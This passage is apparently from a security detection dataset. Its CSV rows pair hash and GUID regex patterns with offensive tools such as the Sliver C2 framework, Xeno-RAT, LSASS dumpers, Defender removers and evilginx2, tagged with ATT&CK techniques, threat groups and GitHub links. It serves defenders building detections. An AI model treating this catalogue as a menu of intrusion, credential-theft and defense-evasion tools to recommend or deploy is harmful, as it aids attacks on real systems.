#windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26725" "*534D9A24-3138-4209-A4C6-6B9C1EF0B579*",".{0,1000}534D9A24\-3138\-4209\-A4C6\-6B9C1EF0B579.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","26726" "*535656aca26402527106fc7630aa58d64544975120b7ad1e21b91797b38db760*",".{0,1000}535656aca26402527106fc7630aa58d64544975120b7ad1e21b91797b38db760.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","26727" "*535d2f13597a9418a665c526c21d8388d0af43f331b2da125ffc74f0b0686cd2*",".{0,1000}535d2f13597a9418a665c526c21d8388d0af43f331b2da125ffc74f0b0686cd2.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26728" "*535fd52e4d4887de46e469b65735e1f772ff398bd39c8f9b2995e513ee6e3fb3*",".{0,1000}535fd52e4d4887de46e469b65735e1f772ff398bd39c8f9b2995e513ee6e3fb3.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - 
T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","26729" "*536361a703d684f914e9c94d99ef45a18cba34ff7f2bb045752afe2534b904fe*",".{0,1000}536361a703d684f914e9c94d99ef45a18cba34ff7f2bb045752afe2534b904fe.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","26730" "*5374b615af370b5b03281366c6561f4ebb4f0f2716e8005f07cc4572d865b80a*",".{0,1000}5374b615af370b5b03281366c6561f4ebb4f0f2716e8005f07cc4572d865b80a.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","0","#filehash","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","26732" "*537a987d9bfe60b24a9bef0a9214f64202e91ea5fe14b1c3063317387f595bf7*",".{0,1000}537a987d9bfe60b24a9bef0a9214f64202e91ea5fe14b1c3063317387f595bf7.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26734" "*537afccaa5bf9ab3024691cea87acaf87f457798388856ab41bde9e30515c300*",".{0,1000}537afccaa5bf9ab3024691cea87acaf87f457798388856ab41bde9e30515c300.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26735" "*537dfda00b6ce57ca35f3da4eaac5cfc42c4180d5573673a66c4665517d0a208*",".{0,1000}537dfda00b6ce57ca35f3da4eaac5cfc42c4180d5573673a66c4665517d0a208.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","#filehash","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","26736" "*537ea05a68fa2fc81101b89b2a603469d497bf1d31134cf1a7b8971c5d84141f*",".{0,1000}537ea05a68fa2fc81101b89b2a603469d497bf1d31134cf1a7b8971c5d84141f.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","26737" "*537fee794fe5532349360a40d90c0e0e37f9532b0101dbb17174e27cc4aa0d51*",".{0,1000}537fee794fe5532349360a40d90c0e0e37f9532b0101dbb17174e27cc4aa0d51.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","26738" "*53891DF6-3F6D-DE4B-A8CD-D89E94D0C8CD*",".{0,1000}53891DF6\-3F6D\-DE4B\-A8CD\-D89E94D0C8CD.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","0","#GUIDproject","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","26739" "*5393591887944346cc4d8f6af3199b63b7480354d553fcddb35c34feb9c6b8d7*",".{0,1000}5393591887944346cc4d8f6af3199b63b7480354d553fcddb35c34feb9c6b8d7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26740" 
"*5397c248984f9681bec95bd71753e0516bab6e907a0517620a5f7549760e89f0*",".{0,1000}5397c248984f9681bec95bd71753e0516bab6e907a0517620a5f7549760e89f0.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26741" "*53a8f4b6cd47f980a97be192fdbf70c028065c7bfdf2e461927c7561eafbea6b*",".{0,1000}53a8f4b6cd47f980a97be192fdbf70c028065c7bfdf2e461927c7561eafbea6b.{0,1000}","offensive_tool_keyword","ATPMiniDump","Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis","T1003 - T1005 - T1055 - T1218","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/b4rtik/ATPMiniDump","1","0","#filehash","N/A","N/A","3","255","46","2019-12-02T15:01:22Z","2019-11-29T19:49:54Z","26743" "*53a9c6eed3ee5ed0ea6fe900bbcdac2b9c0709c57c8d82688ef32f7e2b784f60*",".{0,1000}53a9c6eed3ee5ed0ea6fe900bbcdac2b9c0709c57c8d82688ef32f7e2b784f60.{0,1000}","offensive_tool_keyword","pastehakk","perform clipboard poisoning or paste jacking attack","T1115","T0001 - T0002 - T0005","N/A","N/A","Phishing","https://github.com/3xploitGuy/pastehakk","1","0","#linux #filehash","N/A","7","1","56","10","2020-06-22T01:17:53Z","2020-06-17T19:32:24Z","26744" "*53b439d28020a437a1d940fb4c9525283c8093326c1c187da245282e840ba0a4*",".{0,1000}53b439d28020a437a1d940fb4c9525283c8093326c1c187da245282e840ba0a4.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","26748" "*53bf7ddf48f5231ddaec4e8fe47636f62541226c5bb53374012a68f75c182451*",".{0,1000}53bf7ddf48f5231ddaec4e8fe47636f62541226c5bb53374012a68f75c182451.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","26750" "*53bf7ddf48f5231ddaec4e8fe47636f62541226c5bb53374012a68f75c182451*",".{0,1000}53bf7ddf48f5231ddaec4e8fe47636f62541226c5bb53374012a68f75c182451.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. 
Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","26751" "*53c5ce630848990bacd8fbc314944205c6f9d3428d713cb457190290b0c51769*",".{0,1000}53c5ce630848990bacd8fbc314944205c6f9d3428d713cb457190290b0c51769.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26753" "*53ceac06a248c60ecf2879fa2cab20508ddc1b73d91e8a418655c64f991838c2*",".{0,1000}53ceac06a248c60ecf2879fa2cab20508ddc1b73d91e8a418655c64f991838c2.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","26757" "*53e18a3e3ac71cf173f06cc3f01a00744fa0b1c3af7ba8de1e62b881299247a1*",".{0,1000}53e18a3e3ac71cf173f06cc3f01a00744fa0b1c3af7ba8de1e62b881299247a1.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26759" "*53ef079f580e806d9fae5fd698616574623fd44467c446540ba1194c20c6c388*",".{0,1000}53ef079f580e806d9fae5fd698616574623fd44467c446540ba1194c20c6c388.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit 
low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","26762" "*53ef805c456f2b3312be89695e41cc4693cf6fe169388c32aedb207e1d3a6a6b*",".{0,1000}53ef805c456f2b3312be89695e41cc4693cf6fe169388c32aedb207e1d3a6a6b.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","26763" "*53f349d9fefb61b435f3b257f63ec8720b92cc4446cc08455e53ba9c5ca8071c*",".{0,1000}53f349d9fefb61b435f3b257f63ec8720b92cc4446cc08455e53ba9c5ca8071c.{0,1000}","offensive_tool_keyword","GoAWSConsoleSpray","brute-force AWS IAM Console credentials to discover valid logins for user accounts","T1078 - T1110 - T1187 - T1110.001","TA0006 - TA0007 - TA0003 - TA0001","N/A","N/A","Credential Access","https://github.com/WhiteOakSecurity/GoAWSConsoleSpray","1","0","#filehash","N/A","9","1","29","5","2022-06-15T18:16:21Z","2022-06-15T18:11:39Z","26764" "*53f520d2ad626e798afef1865d9e91aaaa6f98e6062423819f9222357d1bf676*",".{0,1000}53f520d2ad626e798afef1865d9e91aaaa6f98e6062423819f9222357d1bf676.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26766" "*5400dd85170bb1f4597ffb2d761aab44e311f00b286c423bcf82a2c765bb8bd2*",".{0,1000}5400dd85170bb1f4597ffb2d761aab44e311f00b286c423bcf82a2c765bb8bd2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26767" "*5406c993ef16ac875804185a8f37db5b2473def489a613de0b667f304b498c97*",".{0,1000}5406c993ef16ac875804185a8f37db5b2473def489a613de0b667f304b498c97.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","26769" 
"*540967d13db656212627d62d92f1ea985fc668cd5ee0aff670d2ecca51f6d302*",".{0,1000}540967d13db656212627d62d92f1ea985fc668cd5ee0aff670d2ecca51f6d302.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26771" "*54127199e63da3f970416117b90980efe214cf9d313a38129cf9c09ceb1b6c7f*",".{0,1000}54127199e63da3f970416117b90980efe214cf9d313a38129cf9c09ceb1b6c7f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26772" "*54138c7dfb078ce768fe9893ea069bbedbf249a10add1e3a772aaa14497ac863*",".{0,1000}54138c7dfb078ce768fe9893ea069bbedbf249a10add1e3a772aaa14497ac863.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26773" "*541408686147c9ba7d59b1b4430addb3aabcf0033353ed1140d182243012b934*",".{0,1000}541408686147c9ba7d59b1b4430addb3aabcf0033353ed1140d182243012b934.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","26774" 
"*541d58d2674466283a1d43faf0b7a0dba0cc29e67f2112bde3ac3d9384531446*",".{0,1000}541d58d2674466283a1d43faf0b7a0dba0cc29e67f2112bde3ac3d9384531446.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26775" "*542742cf1661a2e40473ffd6e8f3a4a1035a6ad31cd5ac6ca90965ef03646f27*",".{0,1000}542742cf1661a2e40473ffd6e8f3a4a1035a6ad31cd5ac6ca90965ef03646f27.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","26776" "*542bee76ffdd8095a8d134b6eea2fa001c4af43c1e6cd4e296c2b8d52571c16c*",".{0,1000}542bee76ffdd8095a8d134b6eea2fa001c4af43c1e6cd4e296c2b8d52571c16c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26777" "*542c779d785acb08e773a28f3de3c51c64ebbb2bbea0bd3ff70dc87f830add68*",".{0,1000}542c779d785acb08e773a28f3de3c51c64ebbb2bbea0bd3ff70dc87f830add68.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","26778" 
"*543111f63af0bba0de982e608dde5289571d227b941c74131a8b9df9a8dc2609*",".{0,1000}543111f63af0bba0de982e608dde5289571d227b941c74131a8b9df9a8dc2609.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","#filehash","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","26780" "*54398cb2ba983d091f03ee04da0fd726b0f093d561808d336cf6087bd42f1f16*",".{0,1000}54398cb2ba983d091f03ee04da0fd726b0f093d561808d336cf6087bd42f1f16.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","26782" "*54398ce81884b96d375b383c19b990208a38ca7a4d0fd05716a33c18713f4c29*",".{0,1000}54398ce81884b96d375b383c19b990208a38ca7a4d0fd05716a33c18713f4c29.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26783" "*5439CECD-3BB3-4807-B33F-E4C299B71CA2*",".{0,1000}5439CECD\-3BB3\-4807\-B33F\-E4C299B71CA2.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/nettitude/MalSCCM","1","0","#GUIDproject","N/A","10","3","246","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z","26784" "*543d7ad609377d2797ceba313047cdf1bd601553c3d49e34f58e1ec0ac438ab8*",".{0,1000}543d7ad609377d2797ceba313047cdf1bd601553c3d49e34f58e1ec0ac438ab8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26785" "*544207337c0553feb47498ed24a367c427dcb5feb49f0e3eee4913d235610262*",".{0,1000}544207337c0553feb47498ed24a367c427dcb5feb49f0e3eee4913d235610262.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","26786" "*5443182b6f9eabeb908b426fa819ca96bb270a34c5efc385dadc5a710532c3be*",".{0,1000}5443182b6f9eabeb908b426fa819ca96bb270a34c5efc385dadc5a710532c3be.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26787" "*545769561413f19fbcf5a5593b70deb40d9b56c0acef1adb4854c98572867773*",".{0,1000}545769561413f19fbcf5a5593b70deb40d9b56c0acef1adb4854c98572867773.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26790" "*54584005fc341d7306b10709e9daf7ab60fcb9c782b7c81aa59c667d41d065bc*",".{0,1000}54584005fc341d7306b10709e9daf7ab60fcb9c782b7c81aa59c667d41d065bc.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","#filehash","N/A","10","7","N/A","N/A","N/A","N/A","26791" "*5461cba9d022a943c36a95b7e1017274ae210aeb8b204c9d3a9ab5dcb40c90f8*",".{0,1000}5461cba9d022a943c36a95b7e1017274ae210aeb8b204c9d3a9ab5dcb40c90f8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26792" "*54680b2daca9c4051463a646c0ea849190b741081670d933e00ed182b2efcc56*",".{0,1000}54680b2daca9c4051463a646c0ea849190b741081670d933e00ed182b2efcc56.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26794" "*546c0fbbb9b7fbecd588e977612bec1b6bb1b3733c5e942e505a1b2b8de8697b*",".{0,1000}546c0fbbb9b7fbecd588e977612bec1b6bb1b3733c5e942e505a1b2b8de8697b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26797" 
